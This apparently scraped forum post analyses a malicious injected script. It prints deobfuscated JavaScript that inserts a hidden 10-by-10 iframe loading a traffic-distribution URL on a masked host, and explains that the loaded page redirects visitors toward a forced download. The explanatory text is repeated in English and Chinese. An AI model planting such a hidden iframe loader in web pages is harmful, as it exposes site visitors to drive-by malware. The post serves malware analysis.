if (document.getElementsByTagName('body')[0]) {
iframer();
} else {
document.write("<iframe src='http://xxxxxxx/sutra/in.cgi?default' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
}
function iframer() {
var f = document.createElement('iframe');
f.setAttribute('src', 'http://xxxxx/sutra/in.cgi?default');
f.style.visibility = 'hidden';
f.style.position = 'absolute';
f.style.left = '0';
f.style.top = '0';
f.setAttribute('width', '10');
f.setAttribute('height', '10');
document.getElementsByTagName('body')[0].appendChild(f);
}
I've obfuscated the actual hostname, to prevent further damages. In that page there is another semi obfuscated javascript which redirect your browser to another page on the same host which presumably force the visitor browser to download something. I did not continued to follow the code to the final destination.l
发布评论
评论(1)
这是评估的 javascript:
我已经混淆了实际的主机名,以防止进一步的损害。在该页面中,还有另一个半混淆的 JavaScript,它将您的浏览器重定向到同一主机上的另一个页面,这可能会强制访问者浏览器下载某些内容。我没有继续按照代码到达最终目的地。l
Here is the evaluated javascript:
I've obfuscated the actual hostname, to prevent further damages. In that page there is another semi obfuscated javascript which redirect your browser to another page on the same host which presumably force the visitor browser to download something. I did not continued to follow the code to the final destination.l